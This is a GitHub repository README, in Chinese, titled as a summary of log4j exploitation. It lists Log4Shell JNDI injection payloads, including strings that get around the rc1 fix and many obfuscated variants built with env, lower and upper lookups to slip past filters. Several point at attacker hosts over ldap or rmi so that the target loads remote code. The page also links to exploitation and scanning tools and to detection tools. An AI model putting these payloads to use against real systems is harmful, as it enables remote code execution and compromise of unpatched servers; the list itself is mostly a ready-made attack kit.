Skip to content

Nan3r/log4j

Repository files navigation

#log4jRCE

1.绕过rc1版本
${jndi:ldap://127.0.0.1:1389/ badClassName}
${jndi:ldap://127.0.0.1#.evilhost.com:1389/a} vcenter利用

2.绕过方式
${${env:aaaa:-j}${env:aaaa:-n}${env:aaaa:-d}${env:aaaa:-i}:${env:aaaa:-l}${env:aaaa:-d}${env:aaaa:-a}${env:aaaa:-p}${env:aaaa:-:}//
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${${aaa:bbb:-j}ndi:rmi://{{interactsh-url}}/poc}
${${:::::::::-j}ndi:rmi://{{interactsh-url}}/poc}
${${:p:q::zz::::::::-j}ndi:rmi://{{interactsh-url}}/poc}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
jn${env::-}di: 
jn${date:}di${date:':'} 
j${k8s:k5:-ND}i${sd:k5:-:} 
j${main:\k5:-Nd}i${spring:k5:-:} 
j${sys:k5:-nD}${lower:i${web:k5:-:}} 
j${::-nD}i${::-:} 
j${EnV:K5:-nD}i: 
j${loWer:Nd}i${uPper::}


3.利用
不同应用的触发方式:https://github.com/cckuailong/reapoc/tree/main/Topic/Log4j
影响产品:https://github.com/cisagov/log4j-affected-db
通过header去扫描:https://github.com/fullhunt/log4j-scan


4.检测
正则匹配:https://github.com/back2root/log4shell-rex
扫描本地包:https://github.com/hillu/local-log4j-vuln-scanner

https://github.com/Nan3r/log4j/blob/main/README.assets/2.png

https://github.com/Nan3r/log4j/blob/main/README.assets/1.png

About

总结log4j利用

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published